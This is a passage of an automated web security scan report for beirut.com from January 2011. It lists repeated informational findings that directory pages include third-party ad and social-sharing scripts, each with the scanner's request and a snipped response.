<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.630. http://www.beirut.com/Recreations/Yoga-Centers/03053122 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Recreations/Yoga-Centers/03053122

Issue detail

The response dynamically includes the following scripts from other domains:

http://d1.openx.org/ag.php
http://s7.addthis.com/js/250/addthis_widget.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Recreations/Yoga-Centers/03053122 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 07:52:29 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 58316

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.631. http://www.beirut.com/Restaurants/Bakeries/6807482759 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Restaurants/Bakeries/6807482759

Issue detail

The response dynamically includes the following scripts from other domains:

http://d1.openx.org/ag.php
http://s7.addthis.com/js/250/addthis_widget.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Restaurants/Bakeries/6807482759 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 08:00:25 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61564

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.632. http://www.beirut.com/Restaurants/Cafes/318727173 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Restaurants/Cafes/318727173

Issue detail

The response dynamically includes the following scripts from other domains:

http://d1.openx.org/ag.php
http://s7.addthis.com/js/250/addthis_widget.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Restaurants/Cafes/318727173 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 07:59:46 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61382

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.633. http://www.beirut.com/Restaurants/Caterers/7413291663 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Restaurants/Caterers/7413291663

Issue detail

The response dynamically includes the following scripts from other domains:

http://d1.openx.org/ag.php
http://s7.addthis.com/js/250/addthis_widget.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Restaurants/Caterers/7413291663 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 08:16:19 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61646

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.634. http://www.beirut.com/Restaurants/Dining/314749128 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Restaurants/Dining/314749128

Issue detail

The response dynamically includes the following scripts from other domains:

http://d1.openx.org/ag.php
http://s7.addthis.com/js/250/addthis_widget.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 07:56:13 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 63313

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.635. http://www.beirut.com/Restaurants/Health-and-Diet-Shops/34430696 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Restaurants/Health-and-Diet-Shops/34430696

Issue detail

The response dynamically includes the following scripts from other domains:

http://d1.openx.org/ag.php
http://s7.addthis.com/js/250/addthis_widget.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Restaurants/Health-and-Diet-Shops/34430696 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 08:00:29 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 57954

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.636. http://www.beirut.com/Restaurants/Ice-Cream-and-Sweets/2144072380 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Restaurants/Ice-Cream-and-Sweets/2144072380

Issue detail

The response dynamically includes the following scripts from other domains:

http://d1.openx.org/ag.php
http://s7.addthis.com/js/250/addthis_widget.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Restaurants/Ice-Cream-and-Sweets/2144072380 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 08:03:25 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61553

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.637. http://www.beirut.com/Restaurants/Juice-Stalls/528624339 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Restaurants/Juice-Stalls/528624339

Issue detail

The response dynamically includes the following scripts from other domains:

http://d1.openx.org/ag.php
http://s7.addthis.com/js/250/addthis_widget.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Restaurants/Juice-Stalls/528624339 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 08:13:21 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 58733

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.638. http://www.beirut.com/Restaurants/Take-Away/646084613 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Restaurants/Take-Away/646084613

Issue detail

The response dynamically includes the following scripts from other domains:

http://d1.openx.org/ag.php
http://s7.addthis.com/js/250/addthis_widget.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Restaurants/Take-Away/646084613 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 07:55:05 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 54818

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.639. http://www.beirut.com/Restaurants/Winery/0312375197 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Restaurants/Winery/0312375197

Issue detail

The response dynamically includes the following scripts from other domains:

http://d1.openx.org/ag.php
http://s7.addthis.com/js/250/addthis_widget.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Restaurants/Winery/0312375197 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 07:55:45 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 54776

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.640. http://www.beirut.com/Shopping/Books-Music-Movies/05084418 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Books-Music-Movies/05084418

Issue detail

The response dynamically includes the following scripts from other domains:

http://d1.openx.org/ag.php
http://s7.addthis.com/js/250/addthis_widget.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Shopping/Books-Music-Movies/05084418 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 09:05:45 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61601

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.641. http://www.beirut.com/Shopping/Books-Music-Movies/05084418/Bookshops/5 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Books-Music-Movies/05084418/Bookshops/5

Issue detail

The response dynamically includes the following scripts from other domains:

http://d1.openx.org/ag.php
http://s7.addthis.com/js/250/addthis_widget.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Shopping/Books-Music-Movies/05084418/Bookshops/5 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 08:58:46 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61222

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.642. http://www.beirut.com/Shopping/Books-Music-Movies/05084418/Movie-Rentals/3 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Books-Music-Movies/05084418/Movie-Rentals/3

Issue detail

The response dynamically includes the following scripts from other domains:

http://d1.openx.org/ag.php
http://s7.addthis.com/js/250/addthis_widget.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Shopping/Books-Music-Movies/05084418/Movie-Rentals/3 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
